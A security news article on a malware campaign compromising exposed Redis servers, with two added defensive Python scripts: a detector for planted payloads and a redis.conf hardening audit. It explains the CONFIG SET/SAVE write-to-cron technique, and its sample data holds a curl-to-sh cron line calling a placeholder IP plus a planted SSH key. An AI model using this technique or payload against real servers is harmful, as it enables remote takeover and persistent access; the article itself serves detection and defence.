LTS Secure Warning: Three-quarters of Open Redis servers infected with malware

An Imperva research report shows that three out of four Redis servers exposed to the Internet are infected with malware.

Redis (REmote DIctionary Server) is a widely popular open source in-memory data structure store that can be used as a distributed database, message broker or cache. It is designed to be accessed from inside trusted environments and should not be exposed to the Internet.

In a recent development, Imperva observed attackers deploying a new crypto-mining attack dubbed RedisWannaMine, which drops its mining script on the targeted servers, both database servers and application servers.

The current report describes a massive malware campaign targeting open Redis servers, which has already compromised about 75% of the Redis servers exposed to the Internet.

Technical Details

Researchers said that the attackers set a key/value pair in memory and then make Redis save it to a file on disk, in a location where the file's contents will be executed or trusted (e.g. /etc/crontabs, /var/spool/cron/crontab, or a user's SSH authorized_keys file). The write is done with Redis's own persistence: the attacker points the dir and dbfilename settings at the target path with CONFIG SET and then issues SAVE, so the dump file, with the planted value inside it, lands where cron or sshd will read it. The values attackers set usually contain commands that download a remote resource and run it. Another popular type of payload is an SSH public key, which gives the attacker remote access to the machine so they can take it over.
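The following Python script is an added example for this article, not code from Imperva or LTS Secure. It shows how a defender can check a Redis instance for the two traces this technique leaves: planted values that look like cron download-and-execute lines or SSH public keys, and dir/dbfilename settings redirected to a cron or SSH location. The key/value pairs and CONFIG values are constructed to resemble what SCAN/GET and CONFIG GET would return on an infected and on a clean server, and the indicator patterns are assumptions derived from the technique described above, not signatures from the report.

```python
"""Check Redis contents and persistence settings for planted payloads.

Added example for this article; not code from Imperva or LTS Secure.
Sample data below is constructed; indicator patterns are assumptions.
"""
import posixpath
import re
from typing import Dict, List

# "fetch something remote and run it": curl/wget piped into a shell, or
# followed by chmod / a direct execution.
DOWNLOAD_EXEC = re.compile(
    r"\b(?:curl|wget)\b.*?(?:\|\s*(?:ba)?sh\b|(?:&&|;)\s*(?:chmod|\./|(?:ba)?sh\b))",
    re.IGNORECASE | re.DOTALL,
)
# OpenSSH public key material, as planted into authorized_keys.
SSH_PUBKEY = re.compile(r"\bssh-(?:rsa|ed25519|dss)\s+[A-Za-z0-9+/=]{40,}")
# A crontab line: five schedule fields, then a user or a command.
CRON_LINE = re.compile(r"^\s*(?:[\d*,/\-]+\s+){5}\S")
# Writing the RDB dump under any of these makes its content run.
CRON_PREFIXES = ("/var/spool/cron", "/etc/cron", "/etc/crontab")


def classify_value(value: str) -> List[str]:
    """Return the indicator names matched by one stored value."""
    findings = []
    if DOWNLOAD_EXEC.search(value):
        findings.append("download-and-execute")
    if SSH_PUBKEY.search(value):
        findings.append("ssh-public-key")
    if any(CRON_LINE.match(line) for line in value.splitlines()):
        findings.append("cron-entry")
    return findings


def scan_pairs(pairs: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each suspicious key to its indicators; clean keys are omitted."""
    result = {}
    for key, value in pairs.items():
        findings = classify_value(value)
        if findings:
            result[key] = findings
    return result


def persistence_target(dir_: str, dbfilename: str) -> str:
    """Resolve CONFIG GET dir + dbfilename to the path SAVE would write and
    say why that path is dangerous; returns '' for an ordinary data dir."""
    path = posixpath.normpath(posixpath.join(dir_, dbfilename))
    if posixpath.basename(path) == "authorized_keys" or "/.ssh/" in path:
        return f"SAVE would overwrite an SSH authorized_keys file: {path}"
    if path.startswith(CRON_PREFIXES):
        return f"SAVE would write into a cron location: {path}"
    return ""


# Constructed sample data: two ordinary application keys and two payloads.
# Attackers pad the value with newlines so the binary RDB header and footer
# around it end up on their own lines, which cron and sshd skip over.
SAMPLE_PAIRS = {
    "session:42": '{"user": "alice", "role": "viewer"}',
    "cache:home": "<html><body>hello</body></html>",
    "backup1": "\n\n*/1 * * * * curl -fsSL http://203.0.113.7/a.sh | sh\n\n",
    "crackit": "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCconstructedKEYmaterialXXXXXXXXXX attacker@example\n\n",
}
# Constructed CONFIG GET output; the first is what a hijacked server shows.
HIJACKED_CONFIG = {"dir": "/var/spool/cron/crontabs", "dbfilename": "root"}
NORMAL_CONFIG = {"dir": "/var/lib/redis", "dbfilename": "dump.rdb"}

if __name__ == "__main__":
    for key, indicators in scan_pairs(SAMPLE_PAIRS).items():
        print(f"{key}: {', '.join(indicators)}")
    for cfg in (HIJACKED_CONFIG, NORMAL_CONFIG):
        print(persistence_target(cfg["dir"], cfg["dbfilename"]) or f"{cfg}: ok")
```

On a live server the same functions would be fed from SCAN/GET and CONFIG GET dir / CONFIG GET dbfilename; a dir outside the expected data directory is the clearest sign, because a legitimate deployment never points its dump at a cron spool or an .ssh directory.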

The report says Imperva's customers were attacked more than 75,000 times from 295 IP addresses belonging to public Redis servers.

Imperva found that three-quarters of the open Redis servers accessible from the Internet (on port 6379) hold malicious key-value pairs in memory, indicating that, despite multiple warnings, administrators continue to leave their servers exposed to attackers.

Impact

The report says a large amount of data on these publicly accessible servers has been compromised: private SSH keys that give access to other servers, certificates that can be used to decrypt network traffic, PII and other sensitive data.

Moreover, the attackers now use the compromised servers as proxies to scan other websites for vulnerabilities, including SQL injection, cross-site scripting, malicious file upload and remote code execution.

Recommended Actions

  • Make sure you follow the Redis security notes, i.e.
    • Don't expose Redis to the Internet: bind it to a loopback or internal address and keep protected mode on.
    • Enable authentication (requirepass) wherever possible.
    • Don't store sensitive data in clear text.
  • Monitor your Redis server (its keys and its dir/dbfilename configuration) to make sure it is not infected.
  • Monitor processes and CPU consumption to detect running crypto-mining malware.
  • Run Redis with the minimum privileges necessary (a dedicated unprivileged user), so that a dump written through SAVE cannot reach root's crontab or authorized_keys.
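As an added example for this article (not code from Imperva or the Redis project), the script below audits a redis.conf against the configuration points in the list above: network exposure, protected mode, authentication and whether the CONFIG command that the attack relies on is still reachable. The two configurations it contains are constructed, one resembling an Internet-exposed server of the kind the report describes and one applying the recommendations; the requirepass value is a placeholder.

```python
"""Audit a redis.conf against the hardening recommendations above.

Added example for this article, not from Imperva or the Redis project.
Both configurations are constructed; the password is a placeholder.
"""
from typing import Dict, List

WEAK_CONF = """\
# Constructed: reachable from anywhere, no password, CONFIG usable.
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
# Constructed: loopback only, protected mode, auth, CONFIG/DEBUG disabled.
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""

# bind values that mean "every interface"
ALL_INTERFACES = {"0.0.0.0", "::", "*", "-::*"}


def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to the list of its argument strings (a directive
    such as rename-command may legitimately appear several times)."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        directive, _, args = line.partition(" ")
        conf.setdefault(directive.lower(), []).append(args.strip())
    return conf


def audit(conf: Dict[str, List[str]]) -> List[str]:
    """Return one finding per violated recommendation; empty when clean."""
    findings = []
    # No bind line at all means Redis listens on every interface.
    addresses = " ".join(conf.get("bind", [])).split()
    if not addresses or any(a in ALL_INTERFACES for a in addresses):
        findings.append("bind: listens on all interfaces; bind to 127.0.0.1 or an internal address")
    # protected-mode defaults to yes in Redis 3.2+, so only an explicit 'no' is a finding.
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled; it refuses outside clients when no password is set")
    if not conf.get("requirepass", [""])[0]:
        findings.append("requirepass: no authentication; any client that reaches the port has full control")
    renamed = {args.split()[0].upper() for args in conf.get("rename-command", []) if args.split()}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG is reachable; it lets a client point SAVE at cron or authorized_keys")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        problems = audit(parse_conf(text))
        print(f"{name}: {len(problems)} finding(s)")
        for problem in problems:
            print("  -", problem)
```

Disabling CONFIG with rename-command removes the attacker's ability to redirect the dump file, but it is a backstop, not a substitute for the first two items: a Redis that is not reachable from the Internet and requires a password never receives the SET in the first place.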

Imperva has released a security advisory about Redis Servers on June 1, 2018.